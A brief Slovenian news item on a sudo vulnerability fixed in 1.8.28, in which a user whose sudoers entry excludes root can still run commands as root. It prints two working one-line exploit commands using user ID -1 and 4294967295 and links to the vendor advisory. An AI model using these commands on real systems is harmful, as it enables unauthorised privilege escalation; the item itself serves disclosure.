Napaka v sudo vam omogoča izvajanje katere koli izvedljive datoteke kot root, če /etc/sudoers dovoljuje, da jo izvajajo drugi uporabniki, in je prepovedana za root.
Izkoriščanje napake je zelo preprosto:
sudo -u#-1 id -u
ali:
sudo -u#4294967295 id -u
Napaka je prisotna v vseh različicah sudo pred 1.8.28
Podrobnosti:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Vir: linux.org.ru